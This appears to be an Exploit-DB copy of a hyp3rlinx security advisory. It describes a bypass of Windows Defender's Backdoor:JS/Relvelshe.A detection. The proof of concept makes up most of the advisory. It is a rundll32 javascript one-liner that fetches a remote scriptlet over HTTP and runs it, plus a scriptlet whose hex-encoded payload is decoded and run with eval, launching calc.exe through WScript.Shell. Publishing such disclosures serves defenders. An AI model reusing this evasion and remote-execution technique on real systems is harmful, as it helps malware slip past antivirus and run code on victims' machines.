ba28fce174
9 changes to exploits/shellcodes/ghdb SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration Wondercms 4.3.2 - XSS to RCE Employee Management System v1 - 'email' SQL Injection JFrog Artifactory < 7.25.4 - Blind SQL Injection phpFox < 4.8.13 - (redirect) PHP Object Injection Exploit XAMPP - Buffer Overflow POC Microsoft Windows Defender - VBScript Detection Bypass Microsoft Windows Defender Bypass - Detection Mitigation Bypass
86 lines
No EOL
2.3 KiB
Text
86 lines
No EOL
2.3 KiB
Text
[+] Credits: John Page (aka hyp3rlinx)
|
|
[+] Website: hyp3rlinx.altervista.org
|
|
[+] Source: https://hyp3rlinx.altervista.org/advisories/Windows_Defender_Backdoor_JS.Relvelshe.A_Detection_Mitigation_Bypass.txt
|
|
[+] twitter.com/hyp3rlinx
|
|
[+] ISR: ApparitionSec
|
|
|
|
|
|
|
|
[Vendor]
|
|
www.microsoft.com
|
|
|
|
|
|
[Product]
|
|
Windows Defender
|
|
|
|
|
|
[Vulnerability Type]
|
|
Detection Mitigation Bypass
|
|
Backdoor:JS/Relvelshe.A
|
|
|
|
|
|
[CVE Reference]
|
|
N/A
|
|
|
|
|
|
[Security Issue]
|
|
Back in 2022 I released a PoC to bypass the Backdoor:JS/Relvelshe.A detection in defender but it no longer works as was mitigated.
|
|
However, adding a simple javascript try catch error statement and eval the hex string it executes as of the time of this post.
|
|
|
|
|
|
[References]
|
|
https://twitter.com/hyp3rlinx/status/1480657623947091968
|
|
|
|
|
|
[Exploit/POC]
|
|
1) python -m http.server 80
|
|
|
|
2) Open command prompt as Administrator
|
|
|
|
3) rundll32 javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://localhost/yo.tmp")
|
|
|
|
Create file and host on server, this is contents of the "yo.tmp" file.
|
|
|
|
<?xml version="1.0"?>
|
|
<component>
|
|
<script>
|
|
try{
|
|
<![CDATA[
|
|
var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
|
|
var str = '';
|
|
for (var n = 0; n < hex.length; n += 2) {
|
|
str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
|
|
}
|
|
eval(str)
|
|
]]>
|
|
}catch(e){
|
|
eval(str)
|
|
}
|
|
</script>
|
|
</component>
|
|
|
|
|
|
[Network Access]
|
|
Local
|
|
|
|
|
|
|
|
[Severity]
|
|
High
|
|
|
|
|
|
[Disclosure Timeline]
|
|
Vendor Notification:
|
|
February 18, 2024: Public Disclosure
|
|
|
|
|
|
|
|
[+] Disclaimer
|
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
|
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
|
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
|
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
|
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
|
or exploits by the author or elsewhere. All content (c).
|
|
|
|
hyp3rlinx |